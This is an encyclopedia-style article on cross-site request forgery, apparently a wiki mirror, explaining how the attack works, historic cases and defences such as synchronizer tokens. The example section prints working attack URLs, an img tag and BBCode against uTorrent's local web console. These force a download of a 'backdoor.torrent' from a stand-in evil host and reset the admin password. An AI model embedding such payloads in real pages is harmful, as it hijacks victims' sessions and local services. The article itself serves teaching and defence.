Cross-site request forgery

From The Hidden Wiki
(Redirected from CSRF)
Jump to navigationJump to search

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf<ref name=Shiflett />) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts.<ref name=Ristic>Template:Cite book</ref> Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

History

CSRF vulnerabilities have been known and in some cases exploited since 2001.<ref name=Burns>Template:Cite web</ref> Because it is carried out from the user's IP address, some website logs might not have evidence of CSRF.<ref name="Ristic"/> Exploits are under-reported, at least publicly, and as of 2007<ref>Template:Cite web</ref> there are few well-documented examples. The online banking webapplication of ING Direct was vulnerable for a CSRF attack that allowed illicit money transfers.<ref name=zeller>Template:Cite web</ref> Popular video website YouTube was also vulnerable to CSRF in 2008 and this allowed any attacker to perform nearly all actions of any user.<ref name=zeller /> Customers of a bank in Mexico were attacked in early 2008 with an image tag in email. The link in the image tag changed the DNS entry for the bank in their ADSL router to point to a malicious website impersonating the bank.<ref name=List-webappsec>Template:Cite web</ref> McAfee was also vulnerable to CSRF and it allowed attackers to change their company system.<ref name=Mike>Template:Cite web</ref>

Example and characteristics

File:NVD-CVE-2007-1332.png
A National Vulnerability Database page describing a CSRF vulnerability

If an attacker is able to find a reproducible link that executes a specific action on the target page while the victim is being logged in there, he is able to embed such link on a page he controls and trick the victim into opening it.<ref name=Shiflett>Template:Cite web</ref> The attack carrier link may be placed in a location that the victim is likely to visit while logged into the target site (e.g. a discussion forum), sent in a HTML email body or attachment. A real CSRF vulnerability in uTorrent (CVE-2008-6586) exploited the fact that its web console accessible at localhost:8080 allowed mission-critical actions to be executed as a matter of simple GET request:

Force a .torrent file download
https://localhost:8080/gui/?action=add-url&s=https://evil.example.com/backdoor.torrent
Change uTorrent administrator password
https://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladmin

Attacks were launched by placing malicious, automatic action HTML image elements on forums and email spam, so that browsers of people visiting these pages would open them automatically, without much user action. People running vulnerable uTorrent version at the same time as opening these pages were susceptible to the attack.

<source lang="html"><img src="https://localhost:8080/gui/?action=add-url&s=https://evil.example.com/backdoor.torrent"></source>

CSRF attacks using image tags are often made from Internet forums, where users are allowed to post images but not JavaScript, for example using BBCode:

<source lang="bbcode">[img]https://localhost:8080/gui/?action=add-url&s=https://evil.example.com/backdoor.torrent[/img]</source>

When accessing the attack link to example.com, the browser would also always automatically send any existing cookies for that domain, which makes CSRF attacks to execute hostile actions as long as the user is logged in to that website at the time of the attack.

A cross-site request forgery is a confused deputy attack against a Web browser. The deputy in the bank example is Alice's Web browser which is confused into misusing Alice's authority at Mallory's direction.

The following characteristics are common to CSRF:

  • Involve sites that rely on a user's identity
  • Exploit the site's trust in that identity
  • Trick the user's browser into sending HTTP requests to a target site
  • Involve HTTP requests that have side effects

At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action. A user who is authenticated by a cookie saved in the user's web browser could unknowingly send an HTTP request to a site that trusts the user and thereby causes an unwanted action.

In the above example, the attack was facilitated by the fact that uTorrent's web interface used GET request for critical state-changing operations (change credentials, download a file etc.), which is explicitly discouraged by the RFC 2616:

Template:Quotation

Because of this assumption, many existing CSRF prevention mechanisms in web frameworks will not cover GET requests, but rather apply the protection only to HTTP methods that are intended to be state-changing.<ref>Template:Cite web</ref>

Forging login requests

An attacker may forge a request to log the victim into a target website using the attacker's credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account. This attack has been demonstrated against Google<ref>Adam Barth, Collin Jackson, and John C. Mitchell, Robust Defenses for Cross-Site Request Forgery, Proceedings of the 15th ACM Conference on Computer and Communications Security, ACM 2008</ref> and Yahoo.<ref>Joseph Foulds, Passive monitoring login request forgery, Yahoo</ref>

HTTP verbs and CSRF

Different HTTP request methods have different level of susceptibility to CSRF attacks and require different levels of protection due to their different handling by web browsers.

  • In HTTP GET the CSRF exploitation is trivial, using methods described above, such as a simple hyperlink containing manipulated parameters and automatically loaded by a IMG tag. By the HTTP specification however, GET should be used as a safe method, that is, not significantly changing user's state in the application. Applications using GET for such operations should switch to HTTP POST or use anti-CSRF protection.
  • HTTP POST has different vulnerability to CSRF, depending on detailed usage scenarios:
    • In simplest form of POST with data encoded as a query string (field1=value1&field2=value2) CSRF attack is easily implemented using a simple HTML form and anti-CSRF measures must be applied.
    • If data is sent in any other format (JSON, XML) a standard method is to issue a POST request using XMLHttpRequest with CSRF attacks prevented by SOP and CORS; there is a technique to send arbitrary content from a simple HTML form using ENCTYPE attribute; such a fake request can be distinguished from legitimate ones by text/plain content type, but if this is not enforced on the server, CSRF can be executed<ref>Template:Cite web</ref><ref>Template:Cite web</ref>
  • other HTTP methods (PUT, DELETE etc.) can only be issued using XMLHttpRequest with SOP and CORS and preventing CSRF; these measures however will not be active on websites that explicitly disable them using Access-Control-Allow-Origin: * header

Other approaches to CSRF

Additionally, while typically described as a static type of attack, CSRF can also be dynamically constructed as part of a payload for a cross-site scripting attack, as demonstrated by the Samy worm, or constructed on the fly from session information leaked via offsite content and sent to a target as a malicious URL. CSRF tokens could also be sent to a client by an attacker due to session fixation or other vulnerabilities, or guessed via a brute-force attack,<ref>Inferno Security Blog Brute-forcing CSRF tokens</ref> rendered on a malicious page that generates thousands of failed requests. The attack class of "Dynamic CSRF", or using a per-client payload for session-specific forgery, was described<ref>Weaponizing Web 2.0</ref> in 2009 by Nathan Hamiel and Shawn Moyer at the BlackHat Briefings,<ref>Dynamic CSRF</ref> though the taxonomy has yet to gain wider adoption.

A new vector for composing dynamic CSRF attacks was presented by Oren Ofer at a local OWASP chapter meeting on January 2012 - "AJAX Hammer - Dynamic CSRF".<ref>Owasp.org: Israel 2012/01: AJAX Hammer - Harnessing AJAX for CSRF Attacks</ref><ref>Downloads - hasc-research - hasc-research - Google Project Hosting. Code.google.com (2013-06-17). Retrieved on 2014-04-12.</ref>

Effects

According to the United States Department of Homeland Security, the most dangerous CSRF vulnerability ranks as the 909th most dangerous software bug ever found.<ref>US-CERT vulnerability list by severity metric</ref> Other severity metrics have been issued for CSRF vulnerabilities that result in remote code execution with root privileges<ref>*****anel Remote Root</ref> as well as a vulnerability that can compromise a root certificate, which will completely undermine a public key infrastructure.<ref>OpenCA CSRF</ref>

Limitations

Several things have to happen for cross-site request forgery to succeed:

  1. The attacker must target either a site that doesn't check the referrer header or a victim with a browser or plugin that allows referer spoofing.Template:Citation needed
  2. The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's e-mail address or password).
  3. The attacker must determine the right values for all the forms or URL inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will most likely fail (unless the attacker is extremely lucky in their guess).
  4. The attacker must lure the victim to a Web page with malicious code while the victim is logged into the target site.

Note that the attack is blind; i.e., the attacker can't see what the target website sends back to the victim in response to the forged requests, unless they exploit a cross-site scripting or other bug at the target website. Similarly, the attacker can only target any links or submit any forms that come up after the initial forged request if those subsequent links or forms are similarly predictable. (Multiple targets can be simulated by including multiple images on a page, or by using JavaScript to introduce a delay between clicks.)

Given these constraints, an attacker might have difficulty finding logged-in victims or attackable form submissions.Template:Citation needed On the other hand, attack attempts are easy to mount and invisible to victims, and application designers are less familiar with and prepared for CSRF attacks than they are for, say, password cracking dictionary attacks.

Prevention

Most CSRF prevention techniques work by embedding additional authentication data into requests that allows the web application to detect requests from unauthorized locations.

Synchronizer token pattern

Synchronizer token pattern is a technique where a token, secret and unique value for each request, is embedded by the web application in all HTML forms and verified on the server side. The token may be generated by any method that ensures unpredictability and uniqueness (e.g. using a hash chain of random seed). The attacker is thus unable to place a correct token in his requests to authenticate them.<ref name=Shiflett /><ref name="owasp">Template:Cite web</ref><ref name=Valhalla>Cross-Site Request Forgery: Demystified</ref>

Example of STP set by Django in a HTML form:

<source lang="xml"><input type="hidden" name="csrfmiddlewaretoken" value="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt" /></source>

STP is the most compatible as it only relies on HTML, but introduces some complexity on the server side, due to the burden associated with checking validity of the token on each single request. As the token is unique and unpredictable, it also enforces proper sequence of events (e.g. screen 1, then 2, then 3) which raises usability problem (e.g. user opens multiple tabs). It can be relaxed by using per session CSRF token instead of per request CSRF token. At the same time, it is difficult to implement web applications that make heavy use of AJAX.

Cookie-to-Header Token

Web applications that use JavaScript for the majority of their operations may use an anti-CSRF technique that relies on same-origin policy:

  • On login, the web application sets a cookie containing a random token that remains the same for the whole user session
Set-Cookie: Csrf-token=i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; expires=Thu, 23-Jul-2015 10:25:33 GMT; Max-Age=31449600; Path=/
  • JavaScript operating on the client side reads its value and copies it into a custom HTTP header sent with each transactional request
X-Csrf-Token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
  • The server validates presence and integrity of the token

Security of this technique is based on the assumption that only JavaScript running within the same origin will be able to read the cookie's value. JavaScript running from a rogue file or email will not be able to read it and copy into the custom header. Even though the csrf-token cookie will be automatically sent with the rogue request, the server will be still expecting a valid X-Csrf-Token header.

The CSRF token itself should be unique and unpredictable. It may be generated randomly, or it may be derived from the session token using HMAC:

csrf_token = HMAC(session_token, application_secret)

The CSRF token cookie must not have httpOnly flag, as it is intended to be read by the JavaScript by design.

This technique is implemented by many modern frameworks, such as Django<ref>Template:Cite web</ref> and AngularJS.<ref>Template:Cite web</ref> Because the token remains constant over the whole user session, it works well with AJAX applications, but does not enforce sequence of events in the web application.

Client side safeguards

Browser extensions such as RequestPolicy (for Mozilla Firefox) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests.

The NoScript extension for Firefox mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing payloads from POST requests sent by untrusted sites to trusted ones. The Application Boundary Enforcer module in NoScript also blocks requests sent from internet pages to local sites (e.g. localhost), preventing CSRF attacks on local services (such as uTorrent) or routers.

The Self Destructing Cookies extension for Firefox does not directly protect from CSRF, but can reduce the attack window, by deleting cookies as soon as they are no longer associated with an open tab.

Other techniques

Various other techniques have been used or proposed for CSRF prevention historically:

  • Verifying that the request's headers contain X-Requested-With (used by Ruby on Rails before v2.0 and Django before v1.2.5), or checking the HTTP Referer header and/or HTTP Origin header.<ref>Origin Header Proposal. People.mozilla.org. Retrieved on 2013-07-29.</ref> However, this is insecure - a combination of browser plugins and redirects can allow an attacker to provide custom HTTP headers on a request to any website, hence allowing a forged request.<ref>Template:Cite web</ref><ref>Template:Cite web</ref>
  • Checking the HTTP Referer header to see if the request is coming from an authorized page is commonly used for embedded network devices because it does not increase memory requirements. However, a request that omits the Referer header must be treated as unauthorized because an attacker can suppress the Referer header by issuing requests from FTP or HTTPS URLs. This strict Referer validation may cause issues with browsers or proxies that omit the Referer header for privacy reasons. Also, old versions of Flash (before 9.0.18) allow malicious Flash to generate GET or POST requests with arbitrary HTTP request headers using CRLF Injection.<ref>Template:Cite web</ref> Similar CRLF injection vulnerabilities in a client can be used to spoof the referrer of an HTTP request.
  • POST request method was for a while perceived as immune to trivial CSRF attacks using parameters in URL (using GET method). However, both POST and any other HTTP method can be now easily executed using XMLHttpRequest. Filtering out unexpected GET requests still prevents some particular attacks, such as cross-site attacks using malicious image URLs or link addresses and cross-site information leakage through <script> elements (JavaScript hijacking); it also prevents (non-security-related) problems with aggressive web crawlers and link prefetching.<ref name="Shiflett" />

Cross-site scripting (XSS) vulnerabilities (even in other applications running on the same domain) allow attackers to bypass most CSRF preventions.<ref>"Article about CSRF and same-origin XSS"</ref> However, methods such as additional authentication and CAPTCHA are still effective.<ref>"OWASP cheat sheet discussing XSS"</ref>

See also

References

1 }}
     | references-column-width 
     | references-column-count references-column-count-{{#if:1|30em}} }}
   | {{#if: 
     | references-column-width }} }}" style="{{#if: 30em
   | {{#iferror: {{#ifexpr: 30em > 1 }}
     | Template:Column-width
     | Template:Column-count }}
   | {{#if: 
     | Template:Column-width }} }} list-style-type: {{#switch: 
   | upper-alpha
   | upper-roman
   | lower-alpha
   | lower-greek
   | lower-roman = {{{group}}}
   | #default = decimal}};">
<references group=""></references>

External links

Template:External links